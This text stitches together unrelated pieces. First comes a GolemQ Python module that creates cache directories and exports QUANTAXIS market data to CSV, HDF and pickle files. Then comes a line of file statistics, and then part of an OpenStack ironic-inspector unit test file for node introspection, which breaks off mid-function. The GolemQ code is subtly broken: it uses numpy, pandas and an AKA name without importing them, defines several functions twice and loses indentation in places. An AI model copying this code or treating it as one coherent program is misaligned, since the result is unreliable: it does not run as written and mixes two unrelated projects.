# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
This module defines some local directories.
"""
import os
import datetime
try:
import QUANTAXIS as QA
from QUANTAXIS.QAUtil.QAParameter import ORDER_DIRECTION
from QUANTAXIS.QAData.QADataStruct import (
QA_DataStruct_Index_min,
QA_DataStruct_Index_day,
QA_DataStruct_Stock_day,
QA_DataStruct_Stock_min,
QA_DataStruct_CryptoCurrency_day,
QA_DataStruct_CryptoCurrency_min,
)
from QUANTAXIS.QAIndicator.talib_numpy import *
from QUANTAXIS.QAUtil.QADate_Adv import (
QA_util_timestamp_to_str,
QA_util_datetime_to_Unix_timestamp,
QA_util_print_timestamp
)
from QUANTAXIS.QAUtil.QALogs import (
QA_util_log_info,
QA_util_log_debug,
QA_util_log_expection)
from QUANTAXIS.QAFetch.QAhuobi import (
FIRST_PRIORITY,
)
except:
    print('PLEASE run "pip install QUANTAXIS" before calling the GolemQ.utils.path module')
pass
"""创建本地文件夹
1. setting_path ==> 用于存放配置文件 setting.cfg
2. cache_path ==> 用于存放临时文件
3. log_path ==> 用于存放储存的log
4. download_path ==> 下载的数据/财务文件
5. strategy_path ==> 存放策略模板
6. bin_path ==> 存放一些交易的sdk/bin文件等
"""
basepath = os.getcwd()
path = os.path.expanduser('~')
user_path = '{}{}{}'.format(path, os.sep, '.GolemQ')
#cache_path = os.path.join(user_path, 'datastore', 'cache')
def cache_path(dirname, portable=False):
"""
    Return a temporary-cache directory rooted at '.GolemQ' under the local user
    directory; if the portable argument is True, return a cache directory rooted
    at the program's startup directory instead.
"""
if (portable):
ret_cache_path = os.path.join(basepath, 'datastore', 'cache', dirname)
else:
ret_cache_path = os.path.join(user_path, 'datastore', 'cache', dirname)
if not (os.path.exists(ret_cache_path) and \
os.path.isdir(ret_cache_path)):
        #print(u'Folder', dirname, 'does not exist, creating it')
#os.mkdir(dirname)
try:
os.makedirs(ret_cache_path)
        except OSError:
            # If the directory already exists, it was probably created
            # concurrently; treat it as if nothing happened
            if not (os.path.exists(ret_cache_path)):
                # otherwise let makedirs raise again
                os.makedirs(ret_cache_path)
return ret_cache_path
def mkdirs_user(dirname):
if not (os.path.exists(os.path.join(user_path, dirname)) and \
os.path.isdir(os.path.join(user_path, dirname))):
        #print(u'Folder', dirname, 'does not exist, creating it')
#os.mkdir(dirname)
try:
os.makedirs(os.path.join(user_path, dirname))
        except OSError:
            # If the directory already exists, it was probably created
            # concurrently; treat it as if nothing happened
            if not (os.path.exists(os.path.join(user_path, dirname))):
                # otherwise let makedirs raise again
                os.makedirs(os.path.join(user_path, dirname))
return os.path.join(user_path, dirname)
def mkdirs(dirname):
if not (os.path.exists(os.path.join(basepath, dirname)) and \
os.path.isdir(os.path.join(basepath, dirname))):
        #print(u'Folder', dirname, 'does not exist, creating it')
#os.mkdir(dirname)
try:
os.makedirs(os.path.join(basepath, dirname))
        except OSError:
            # If the directory already exists, it was probably created
            # concurrently; treat it as if nothing happened
            if not (os.path.exists(os.path.join(basepath, dirname))):
                # otherwise let makedirs raise again
                os.makedirs(os.path.join(basepath, dirname))
return os.path.join(basepath, dirname)
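# Example usage (editor's sketch; the directory names below are hypothetical):
#
#   tmp_dir = cache_path('kline')                  # ~/.GolemQ/datastore/cache/kline
#   tmp_dir2 = cache_path('kline', portable=True)  # <cwd>/datastore/cache/kline
#   log_dir = mkdirs_user('log')                   # ~/.GolemQ/log
#   out_dir = mkdirs('export')                     # <cwd>/export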
def export_csv_min(code, market_type, export_path='export'):
"""
    Data export helper used for training.
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
    if (market_type == QA.MARKET_TYPE.STOCK_CN):
        market_type_alis = 'A-shares'
    elif (market_type == QA.MARKET_TYPE.INDEX_CN):
        market_type_alis = 'index'
    elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
        market_type_alis = 'cryptocurrency'
    #print(u'{} starting to read {} historical data'.format(QA_util_timestamp_to_str()[2:16],
    #      market_type_alis),
    #      code)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
        data_day = QA.QA_fetch_stock_min_adv(code,
                                             '1991-01-01',
                                             '{}'.format(datetime.date.today()),
                                             frequence=frequence)
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
#data_day = QA.QA_fetch_index_day_adv(code,
# '1991-01-01',
# '{}'.format(datetime.date.today(),))
        data_day = QA.QA_fetch_index_min_adv(code,
                                             '1991-01-01',
                                             '{}'.format(datetime.date.today()),
                                             frequence=frequence)
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequence = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end=QA_util_timestamp_to_str(),
frequence=frequence)
if (data_day is None):
        #print('{} has no data'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.to_csv(os.path.join(export_path, 'index', '{}_{}_kline.csv'.format(code, frequence)))
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.to_csv(os.path.join(export_path, 'stock', '{}_{}_kline.csv'.format(code, frequence)))
return data_day.data
def save_hdf_min(code, market_type, export_path='export', features=None):
"""
    Feature-data export helper used for training.
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
if (features is None):
        #print('{} has no data'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
features.to_hdf(os.path.join(export_path, 'index', '{}_{}_features.hdf'.format(code, frequence)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
features.to_hdf(os.path.join(export_path, 'stock', '{}_{}_features.hdf'.format(code, frequence)), key='df', mode='w')
return features
def export_hdf_min(code, market_type, export_path='export', features=None):
"""
    Data export helper used for training.
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
    if (market_type == QA.MARKET_TYPE.STOCK_CN):
        market_type_alis = 'A-shares'
    elif (market_type == QA.MARKET_TYPE.INDEX_CN):
        market_type_alis = 'index'
    elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
        market_type_alis = 'cryptocurrency'
    #print(u'{} starting to read {} historical data'.format(QA_util_timestamp_to_str()[2:16],
    #      market_type_alis),
    #      code)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today()),
frequence=frequence)
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
#data_day = QA.QA_fetch_index_day_adv(code,
# '1991-01-01',
# '{}'.format(datetime.date.today(),))
data_day = QA.QA_fetch_index_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today()),
frequence=frequence)
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequence = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end='{}'.format(datetime.date.today()),
frequence=frequence)
if (data_day is None):
        #print('{} has no data'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.to_hdf(os.path.join(export_path, 'index', '{}_{}_kline.hdf'.format(code, frequence)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.to_hdf(os.path.join(export_path, 'stock', '{}_{}_kline.hdf'.format(code, frequence)), key='df', mode='w')
return data_day.data
def export_csv_day(code, market_type=None, export_path='export'):
"""
    Data export helper used for training.
"""
if (isinstance(code, list)):
code = code[0]
    if (market_type == QA.MARKET_TYPE.STOCK_CN):
        market_type_alis = 'A-shares'
    elif (market_type == QA.MARKET_TYPE.INDEX_CN):
        market_type_alis = 'index'
    elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
        market_type_alis = 'cryptocurrency'
    print(u'{} starting to read {} historical data'.format(QA_util_timestamp_to_str()[2:16],
                                                           market_type_alis),
          code)
#data_day = QA.QA_fetch_stock_min_adv(codelist,
# '2018-11-01',
# '{}'.format(datetime.date.today()),
# frequence=frequence)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_day_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),)).to_qfq()
if (np.isnan(data_day).any() == True):
            # Sometimes data inexplicably goes missing after the ex-rights adjustment during download; backfill with the unadjusted data
predict_null = pd.isnull(data_day.data[AKA.CLOSE])
data_null = data_day.data[predict_null == True]
data_day.data.loc[data_null.index, :] = QA.QA_fetch_stock_day_adv(code,
'{}'.format(data_null.index.get_level_values(level=0).values[0]),
'{}'.format(datetime.date.today(),)).data
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
data_day = QA.QA_fetch_index_day_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),))
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequency = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end=QA_util_timestamp_to_str(),
frequence=frequency)
if (data_day is None):
        print('{} has no data'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.drop(['date_stamp','down_count','up_count'], axis=1).to_csv(os.path.join(export_path, 'index', '{}.csv'.format(code)))
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.drop(['adj'], axis=1).to_csv(os.path.join(export_path, 'stock', '{}.csv'.format(code)))
return data_day.data
def export_hdf_day(code, market_type=None, export_path='export', features=None):
"""
    Data export helper used for training.
"""
if (isinstance(code, list)):
code = code[0]
    if (market_type == QA.MARKET_TYPE.STOCK_CN):
        market_type_alis = 'A-shares'
    elif (market_type == QA.MARKET_TYPE.INDEX_CN):
        market_type_alis = 'index'
    elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
        market_type_alis = 'cryptocurrency'
print(u'{} 开始读取{}历史数据'.format(QA_util_timestamp_to_str()[2:16],
market_type_alis),
code)
#data_day = QA.QA_fetch_stock_min_adv(codelist,
# '2018-11-01',
# '{}'.format(datetime.date.today()),
# frequence=frequence)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_day_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),)).to_qfq()
if (np.isnan(data_day).any()):
# Sometimes rows inexplicably go missing after the forward adjustment (qfq)
# during download; backfill the gaps with the unadjusted data.
predict_null = pd.isnull(data_day.data[AKA.CLOSE])
data_null = data_day.data[predict_null]
data_day.data.loc[data_null.index, :] = QA.QA_fetch_stock_day_adv(code,
'{}'.format(data_null.index.get_level_values(level=0).values[0]),
'{}'.format(datetime.date.today(),)).data
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
data_day = QA.QA_fetch_index_day_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today(),))
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequency = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end=QA_util_timestamp_to_str(),
frequence=frequency)
if (data_day is None):
print('{} has no data'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.drop(['date_stamp','down_count','up_count'], axis=1).to_hdf(os.path.join(export_path, 'index', '{}.hdf'.format(code)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.drop(['adj'], axis=1).to_hdf(os.path.join(export_path, 'stock', '{}.hdf'.format(code)), key='df', mode='w')
return data_day.data
def export_hdf_metadata(export_path, code, frequence='60min', metadata=None):
"""
Subsidiary feature data export module for training.
"""
if (isinstance(code, list)):
code = code[0]
if (metadata is None):
#print('{} has no data'.format(code))
pass
else:
print(os.path.join(export_path, '{}_{}.hdf5'.format(code, frequence)),
metadata.tail(10))
#metadata.to_hdf(os.path.join(export_path, '{}_{}.hdf5'.format(code,
#frequence)), key='df', mode='w')
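# NOTE: despite the .hdf5 extension kept below, the payload is written with
# pandas to_pickle (the to_hdf call above is commented out), so it has to be
# read back with pd.read_pickle rather than pd.read_hdf.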
metadata.to_pickle(os.path.join(export_path, '{}_{}.hdf5'.format(code, frequence)))
return metadata
def export_metadata_to_pickle(export_path, code, frequence='60min', metadata=None):
"""
Subsidiary feature data export module for training.
"""
if (isinstance(code, list)):
code = code[0]
if (metadata is None):
#print('{} has no data'.format(code))
pass
else:
print(os.path.join(export_path, '{}_{}.pickle'.format(code, frequence)),
metadata.tail(3))
#metadata.to_hdf(os.path.join(export_path, '{}_{}.hdf5'.format(code,
#frequence)), key='df', mode='w')
metadata.to_pickle(os.path.join(export_path, '{}_{}.pickle'.format(code, frequence)))
return metadata
def import_metadata_from_pickle(export_path, code, frequence='60min'):
if (isinstance(code, list)):
code = code[0]
print(os.path.join(export_path, '{}_{}.pickle'.format(code, frequence)))
metadata = pd.read_pickle(os.path.join(export_path, '{}_{}.pickle'.format(code, frequence)))
return metadata
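# Usage sketch (illustrative; the 'export' path and code '000001' are
# hypothetical placeholders, not values from the original module, and the
# export directory is assumed to already exist):
def _demo_metadata_roundtrip():
features = pd.DataFrame({'close': [10.0, 10.2]})
export_metadata_to_pickle('export', '000001', frequence='60min', metadata=features)
restored = import_metadata_from_pickle('export', '000001', frequence='60min')
assert restored.equals(features)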
def save_hdf_min(code, market_type, export_path='export', features=None):
"""
Subsidiary feature data export module for training.
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
if (features is None):
#print('{} has no data'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
features.to_hdf(os.path.join(export_path, 'index', '{}_{}_features.hdf'.format(code, frequence)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
features.to_hdf(os.path.join(export_path, 'stock', '{}_{}_features.hdf'.format(code, frequence)), key='df', mode='w')
return features
def export_hdf_min(code, market_type, export_path='export', features=None):
"""
Subsidiary data export module for training.
"""
if (isinstance(code, list)):
code = code[0]
frequence = '60min'
if (market_type == QA.MARKET_TYPE.STOCK_CN):
market_type_alis = 'A-share'
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
market_type_alis = 'index'
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
market_type_alis = 'cryptocurrency'
#print(u'{} Start reading {} historical data'.format(QA_util_timestamp_to_str()[2:16],
# market_type_alis),
# code)
if (market_type == QA.MARKET_TYPE.STOCK_CN):
data_day = QA.QA_fetch_stock_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today()),
frequence=frequence)
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
#data_day = QA.QA_fetch_index_day_adv(code,
# '1991-01-01',
# '{}'.format(datetime.date.today(),))
data_day = QA.QA_fetch_index_min_adv(code,
'1991-01-01',
'{}'.format(datetime.date.today()),
frequence=frequence)
elif (market_type == QA.MARKET_TYPE.CRYPTOCURRENCY):
frequence = '60min'
data_hour = data_day = QA.QA_fetch_cryptocurrency_min_adv(code=code,
start='2009-01-01',
end='{}'.format(datetime.date.today()),
frequence=frequence)
if (data_day is None):
#print('{} has no data'.format(code))
pass
elif (market_type == QA.MARKET_TYPE.INDEX_CN):
mkdirs(os.path.join(export_path, 'index'))
data_day.data.to_hdf(os.path.join(export_path, 'index', '{}_{}_kline.hdf'.format(code, frequence)), key='df', mode='w')
elif (market_type == QA.MARKET_TYPE.STOCK_CN):
mkdirs(os.path.join(export_path, 'stock'))
data_day.data.to_hdf(os.path.join(export_path, 'stock', '{}_{}_kline.hdf'.format(code, frequence)), key='df', mode='w')
return data_day.data
def load_cache(filename='cache.pickle'):
filename = filename.replace(' ', '_').replace(':', '_')
metadata = pd.read_pickle(os.path.join(mkdirs(os.path.join('cache')), filename))
return metadata
def save_cache(filename='cache.pickle', metadata=None):
filename = filename.replace(' ', '_').replace(':', '_')
metadata.to_pickle(os.path.join(mkdirs(os.path.join('cache')), filename))
return filename
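# Usage sketch (illustrative): save_cache replaces spaces and colons in the
# filename with underscores and returns the sanitized name, so a timestamped
# name round-trips cleanly through load_cache. The sample frame below is a
# hypothetical placeholder.
def _demo_cache_roundtrip():
df = pd.DataFrame({'close': [1.0, 2.0]})
name = save_cache('snapshot 2020-01-01 09:30.pickle', metadata=df)
restored = load_cache(name)
assert restored.equals(df)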
def load_snapshot_cache(dirpath, filename='cache.pickle'):
filename = filename.replace(' ', '_').replace(':', '_')
metadata = pd.read_pickle(os.path.join(mkdirs(dirpath), filename))
return metadata
def save_snapshot_cache(dirpath, filename='cache.pickle', metadata=None):
filename = filename.replace(' ', '_').replace(':', '_')
metadata.to_pickle(os.path.join(mkdirs(dirpath), filename))
return os.path.join(mkdirs(dirpath), filename) | 40.341176 | 160 | 0.573588 | 2,455 | 20,574 | 4.573523 | 0.115275 | 0.102423 | 0.052547 | 0.070538 | 0.817599 | 0.803082 | 0.781617 | 0.765764 | 0.741806 | 0.706003 | 0 | 0.016452 | 0.29095 | 20,574 | 510 | 161 | 40.341176 | 0.753222 | 0.166278 | 0 | 0.753125 | 0 | 0 | 0.061932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053125 | false | 0.03125 | 0.03125 | 0 | 0.1375 | 0.028125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f164c3d409b929fec6ba38e1d647294ccbf0f55 | 23,187 | py | Python | ironic_inspector/test/unit/test_introspect.py | gudrutis/ironic-inspector | a2c2b70d973c87b26a4d168c43203b5091bbb9f7 | [
"Apache-2.0"
] | null | null | null | ironic_inspector/test/unit/test_introspect.py | gudrutis/ironic-inspector | a2c2b70d973c87b26a4d168c43203b5091bbb9f7 | [
"Apache-2.0"
] | null | null | null | ironic_inspector/test/unit/test_introspect.py | gudrutis/ironic-inspector | a2c2b70d973c87b26a4d168c43203b5091bbb9f7 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import time
import fixtures
from ironicclient import exceptions
import mock
from oslo_config import cfg
from ironic_inspector.common import ironic as ir_utils
from ironic_inspector import introspect
from ironic_inspector import introspection_state as istate
from ironic_inspector import node_cache
from ironic_inspector.pxe_filter import base as pxe_filter
from ironic_inspector.test import base as test_base
from ironic_inspector import utils
CONF = cfg.CONF
class BaseTest(test_base.NodeTest):
def setUp(self):
super(BaseTest, self).setUp()
introspect._LAST_INTROSPECTION_TIME = 0
self.node.power_state = 'power off'
self.ports = [mock.Mock(address=m) for m in self.macs]
self.ports_dict = collections.OrderedDict((p.address, p)
for p in self.ports)
self.node_info = mock.Mock(uuid=self.uuid, options={})
self.node_info.ports.return_value = self.ports_dict
self.node_info.node.return_value = self.node
driver_fixture = self.useFixture(fixtures.MockPatchObject(
pxe_filter, 'driver', autospec=True))
driver_mock = driver_fixture.mock.return_value
self.sync_filter_mock = driver_mock.sync
def _prepare(self, client_mock):
cli = client_mock.return_value
cli.node.get.return_value = self.node
cli.node.validate.return_value = mock.Mock(power={'result': True})
return cli
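# Note: _prepare wires a mock ironic client whose power-interface validation
# succeeds, so introspection is expected to proceed to setting the PXE boot
# device and rebooting unless an individual test overrides the client.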
@mock.patch.object(node_cache, 'start_introspection', autospec=True)
@mock.patch.object(ir_utils, 'get_client', autospec=True)
class TestIntrospect(BaseTest):
def test_ok(self, client_mock, start_mock):
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
cli.node.validate.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
self.node_info.ports.assert_called_once_with()
self.node_info.add_attribute.assert_called_once_with('mac',
self.macs)
self.sync_filter_mock.assert_called_with(cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
@mock.patch.object(ir_utils, 'get_ipmi_address', autospec=True)
def test_resolved_bmc_address(self, ipmi_mock, client_mock, start_mock):
self.node.driver_info['ipmi_address'] = 'example.com'
addresses = ['93.184.216.34', '2606:2800:220:1:248:1893:25c8:1946']
ipmi_mock.return_value = ('example.com',) + tuple(addresses)
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
cli.node.validate.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=addresses,
manage_boot=True,
ironic=cli)
self.node_info.ports.assert_called_once_with()
self.node_info.add_attribute.assert_called_once_with('mac',
self.macs)
self.sync_filter_mock.assert_called_with(cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_loopback_bmc_address(self, client_mock, start_mock):
self.node.driver_info['ipmi_address'] = '127.0.0.1'
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
cli.node.validate.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[],
manage_boot=True,
ironic=cli)
self.node_info.ports.assert_called_once_with()
self.node_info.add_attribute.assert_called_once_with('mac',
self.macs)
self.sync_filter_mock.assert_called_with(cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_ok_ilo_and_drac(self, client_mock, start_mock):
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
for name in ('ilo_address', 'drac_host'):
self.node.driver_info = {name: self.bmc_address}
introspect.introspect(self.node.uuid)
start_mock.assert_called_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
def test_power_failure(self, client_mock, start_mock):
cli = self._prepare(client_mock)
cli.node.set_power_state.side_effect = exceptions.BadRequest()
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
start_mock.return_value.finished.assert_called_once_with(
introspect.istate.Events.error, error=mock.ANY)
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_unexpected_error(self, client_mock, start_mock):
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
self.sync_filter_mock.side_effect = RuntimeError()
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
self.assertFalse(cli.node.set_boot_device.called)
start_mock.return_value.finished.assert_called_once_with(
introspect.istate.Events.error, error=mock.ANY)
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_set_boot_device_failure(self, client_mock, start_mock):
cli = self._prepare(client_mock)
cli.node.set_boot_device.side_effect = exceptions.BadRequest()
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
cli.node.get.assert_called_once_with(self.uuid)
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_not_called()
start_mock.return_value.finished.assert_called_once_with(
introspect.istate.Events.error, error=mock.ANY)
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_no_macs(self, client_mock, start_mock):
cli = self._prepare(client_mock)
self.node_info.ports.return_value = []
start_mock.return_value = self.node_info
introspect.introspect(self.node.uuid)
self.node_info.ports.assert_called_once_with()
start_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=True,
ironic=cli)
self.assertFalse(self.node_info.add_attribute.called)
self.assertFalse(self.sync_filter_mock.called)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
def test_no_lookup_attrs(self, client_mock, start_mock):
cli = self._prepare(client_mock)
self.node_info.ports.return_value = []
start_mock.return_value = self.node_info
self.node_info.attributes = {}
introspect.introspect(self.uuid)
self.node_info.ports.assert_called_once_with()
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.error, error=mock.ANY)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.node_info.acquire_lock.assert_called_once_with()
self.node_info.release_lock.assert_called_once_with()
def test_no_lookup_attrs_with_node_not_found_hook(self, client_mock,
start_mock):
CONF.set_override('node_not_found_hook', 'example', 'processing')
cli = self._prepare(client_mock)
self.node_info.ports.return_value = []
start_mock.return_value = self.node_info
self.node_info.attributes = {}
introspect.introspect(self.uuid)
self.node_info.ports.assert_called_once_with()
self.assertFalse(self.node_info.finished.called)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
def test_failed_to_get_node(self, client_mock, start_mock):
cli = client_mock.return_value
cli.node.get.side_effect = exceptions.NotFound()
self.assertRaisesRegex(utils.Error,
'Node %s was not found' % self.uuid,
introspect.introspect, self.uuid)
cli.node.get.side_effect = exceptions.BadRequest()
self.assertRaisesRegex(utils.Error,
'%s: Bad Request' % self.uuid,
introspect.introspect, self.uuid)
self.assertEqual(0, self.node_info.ports.call_count)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertFalse(start_mock.called)
self.assertFalse(self.node_info.acquire_lock.called)
def test_failed_to_validate_node(self, client_mock, start_mock):
cli = client_mock.return_value
cli.node.get.return_value = self.node
cli.node.validate.return_value = mock.Mock(power={'result': False,
'reason': 'oops'})
self.assertRaisesRegex(
utils.Error,
'Failed validation of power interface',
introspect.introspect, self.uuid)
cli.node.validate.assert_called_once_with(self.uuid)
self.assertEqual(0, self.node_info.ports.call_count)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertFalse(start_mock.called)
self.assertFalse(self.node_info.acquire_lock.called)
def test_wrong_provision_state(self, client_mock, start_mock):
self.node.provision_state = 'active'
cli = client_mock.return_value
cli.node.get.return_value = self.node
self.assertRaisesRegex(
utils.Error, 'Invalid provision state for introspection: "active"',
introspect.introspect, self.uuid)
self.assertEqual(0, self.node_info.ports.call_count)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertFalse(start_mock.called)
self.assertFalse(self.node_info.acquire_lock.called)
def test_inspect_wait_state_allowed(self, client_mock, start_mock):
self.node.provision_state = 'inspect wait'
cli = client_mock.return_value
cli.node.get.return_value = self.node
cli.node.validate.return_value = mock.Mock(power={'result': True})
introspect.introspect(self.uuid)
self.assertTrue(start_mock.called)
@mock.patch.object(time, 'time')
def test_introspection_delay(self, time_mock, client_mock, start_mock):
time_mock.return_value = 42
introspect._LAST_INTROSPECTION_TIME = 40
CONF.set_override('introspection_delay', 10)
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.uuid)
self.sleep_fixture.mock.assert_called_once_with(8)
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
# updated to the current time.time()
self.assertEqual(42, introspect._LAST_INTROSPECTION_TIME)
@mock.patch.object(time, 'time')
def test_introspection_delay_not_needed(self, time_mock, client_mock,
start_mock):
time_mock.return_value = 100
introspect._LAST_INTROSPECTION_TIME = 40
CONF.set_override('introspection_delay', 10)
cli = self._prepare(client_mock)
start_mock.return_value = self.node_info
introspect.introspect(self.uuid)
self.sleep_fixture.mock.assert_not_called()
cli.node.set_boot_device.assert_called_once_with(self.uuid,
'pxe',
persistent=False)
cli.node.set_power_state.assert_called_once_with(self.uuid,
'reboot')
# updated to the current time.time()
self.assertEqual(100, introspect._LAST_INTROSPECTION_TIME)
def test_no_manage_boot(self, client_mock, add_mock):
